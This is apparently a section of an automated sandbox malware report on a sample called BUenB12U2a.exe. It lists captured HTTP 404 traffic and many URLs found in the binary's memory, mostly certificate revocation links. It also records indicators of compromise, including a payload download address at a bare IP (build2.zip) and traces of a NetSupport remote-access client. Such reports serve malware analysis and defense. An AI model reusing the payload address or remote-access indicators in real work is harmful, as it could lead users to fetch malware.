0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 22 Feb 2025 01:32:32 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 915b390e8ed64233-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wYjTbcs2bJsnZeb3FBXseEK4PbMreGPszASPxffgRQrigOMFpDhCULnEE1nCdDnIi1OGWfHVk4om3pBtp%2F94u84h%2FzHFjVADmL%2Bo8IvWPOwD8SOyXvUsr0C9lO%2BIQLNidOB8v%2B%2BPDN75uhNN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1576&rtt_var=788&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 22 Feb 2025 01:32:33 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 915b39147eb843e7-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yy8DzwgC1jyU9IZLV%2BseAGEsq5t2jm%2BEum2Jn1vFYmVgUoxrlPmn0TnSbbk0VwjwOlZXM7PMjvOYpsQKMWW4X5KXQbA6hq1FaUqCDiC%2BRTCp6GN49fAkt5B7UphF2%2FFTd5uQ9cgSO1URXciv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1692&rtt_var=846&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: client32.exeString found in binary or memory: http://%s/fakeurl.htm
                                Source: BUenB12U2a.exe, 00000001.00000003.1797337365.00000210111CB000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1797646830.00000210111CC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1797337365.0000021011130000.00000004.00000020.00020000.00000000.sdmp, client32.exeString found in binary or memory: http://%s/testpage.htm
                                Source: BUenB12U2a.exe, 00000001.00000003.1797337365.00000210111CB000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1797646830.00000210111CC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1797337365.0000021011130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: BUenB12U2a.exe, 00000001.00000002.1962436230.0000021011290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
                                Source: BUenB12U2a.exe, 00000001.00000003.1801257189.00000210120E6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799989658.00000210118E1000.00000004.00000020.00020000.00000000.sdmp, client32.exeString found in binary or memory: http://127.0.0.1
                                Source: BUenB12U2a.exe, 00000001.00000003.1801257189.00000210120E6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799989658.00000210118E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: BUenB12U2a.exe, 00000001.00000002.1963252056.000002101176C000.00000004.00001000.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1963252056.00000210116CC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://147.45.198.181/build2.zip
                                Source: BUenB12U2a.exe, 00000001.00000002.1963252056.00000210116CC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://147.45.198.181/build2.zipacted
                                Source: BUenB12U2a.exe, 00000000.00000002.1979574044.0000021D68871000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1723175250.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1720942168.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711435934.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712061374.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712744787.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711914802.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712366754.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1720942168.0000021D68871000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712461168.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712236185.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712637069.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712569273.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722697539.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722404525.0000021D68864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: BUenB12U2a.exe, 00000000.00000003.1723175250.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1720942168.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711435934.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712061374.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712744787.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711914802.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712366754.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712461168.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712236185.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712637069.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712569273.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722697539.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722404525.0000021D68864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: BUenB12U2a.exe, 00000000.00000003.1723175250.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1720942168.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711435934.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712061374.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712744787.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711914802.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712366754.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712461168.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712236185.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712637069.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712569273.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722697539.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722404525.0000021D68864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: BUenB12U2a.exe, 00000000.00000002.1979574044.0000021D68871000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1723175250.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1720942168.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711435934.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712061374.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712744787.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711914802.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712366754.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1720942168.0000021D68871000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712461168.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712236185.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712637069.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712569273.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722697539.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722404525.0000021D68864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: BUenB12U2a.exe, 00000001.00000003.1955835239.0000021011144000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929201460.0000021011214000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1904345143.0000021011161000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930285811.0000021011221000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929712668.000002101113A000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929732476.000002101113D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929753262.0000021011143000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930350917.0000021011144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
                                Source: BUenB12U2a.exe, 00000001.00000003.1933113806.00000210110C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1948688209.0000021010811000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1933372942.00000210110D4000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1942392353.00000210110D5000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1958746759.0000021010812000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930450785.00000210110B7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1936180810.00000210110D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                                Source: BUenB12U2a.exe, 00000001.00000003.1904665928.0000021011138000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1933544435.0000021010B24000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929291651.000002101114D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1934879192.0000021010B53000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930124508.0000021011154000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930431371.000002101115A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
                                Source: BUenB12U2a.exe, 00000001.00000003.1904665928.0000021011138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crlSx
                                Source: BUenB12U2a.exe, 00000001.00000003.1928682566.000002101115F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929880283.000002101116C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dh.6H
                                Source: BUenB12U2a.exe, 00000001.00000003.1904345143.0000021011161000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930285811.0000021011221000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929712668.000002101113A000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929732476.000002101113D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929753262.0000021011143000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930350917.0000021011144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
                                Source: BUenB12U2a.exe, 00000001.00000003.1929201460.0000021011214000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930285811.0000021011221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl6f
                                Source: BUenB12U2a.exe, 00000001.00000003.1955835239.0000021011144000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929712668.000002101113A000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929732476.000002101113D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929753262.0000021011143000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930350917.0000021011144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl;;
                                Source: BUenB12U2a.exe, 00000001.00000003.1929201460.0000021011214000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930285811.0000021011221000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1962336771.0000021011229000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
                                Source: BUenB12U2a.exe, 00000001.00000003.1903281529.0000021011914000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929318036.00000210111C8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929340529.00000210111D0000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1928713157.00000210111C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                                Source: BUenB12U2a.exe, 00000001.00000003.1929201460.0000021011214000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930285811.0000021011221000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1962336771.0000021011229000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
                                Source: BUenB12U2a.exe, 00000001.00000003.1903281529.0000021011914000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929318036.00000210111C8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929340529.00000210111D0000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1928713157.00000210111C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                                Source: BUenB12U2a.exe, 00000001.00000003.1796297980.0000021011134000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796297980.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796447903.00000210111C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: BUenB12U2a.exe, 00000001.00000003.1929201460.0000021011214000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930285811.0000021011221000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1962336771.0000021011229000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
                                Source: BUenB12U2a.exe, 00000001.00000003.1933113806.00000210110C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1933372942.00000210110D4000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1942392353.00000210110D5000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930450785.00000210110B7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1936180810.00000210110D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                                Source: BUenB12U2a.exe, 00000000.00000002.1979574044.0000021D68871000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1723175250.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1720942168.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711435934.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712061374.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712744787.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711914802.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712366754.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1720942168.0000021D68871000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712461168.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712236185.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712637069.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712569273.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722697539.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722404525.0000021D68864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: BUenB12U2a.exe, 00000000.00000003.1723175250.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1720942168.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711435934.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712061374.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712744787.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711914802.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712366754.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712461168.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712236185.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712637069.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712569273.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722697539.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722404525.0000021D68864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: BUenB12U2a.exe, 00000000.00000003.1723175250.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1720942168.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711435934.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712061374.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712744787.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711914802.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712366754.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712461168.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712236185.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712637069.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712569273.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722697539.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722404525.0000021D68864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: BUenB12U2a.exe, 00000000.00000003.1722404525.0000021D68864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: BUenB12U2a.exe, 00000000.00000003.1723175250.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1720942168.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711435934.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712061374.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712744787.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711914802.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712366754.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712461168.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712236185.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712637069.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712569273.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722697539.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722404525.0000021D68864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                Source: BUenB12U2a.exe, 00000001.00000003.1745439311.0000021011066000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1962897198.00000210114B0000.00000004.00001000.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1744887932.0000021011086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
                                Source: BUenB12U2a.exe, 00000001.00000003.1801257189.00000210120E6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799989658.00000210118E1000.00000004.00000020.00020000.00000000.sdmp, client32.exeString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: BUenB12U2a.exe, 00000001.00000003.1801257189.00000210120E6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799989658.00000210118E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspLatLongSetChannel(%s)
                                Source: BUenB12U2a.exe, 00000001.00000002.1963252056.00000210116CC000.00000004.00001000.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1746422950.0000021011092000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://goo.gl/zeJZl.
                                Source: BUenB12U2a.exe, 00000001.00000003.1932131962.0000021010BD7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1746596680.0000021010F5A000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1931354269.0000021010F42000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1747515012.0000021010F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
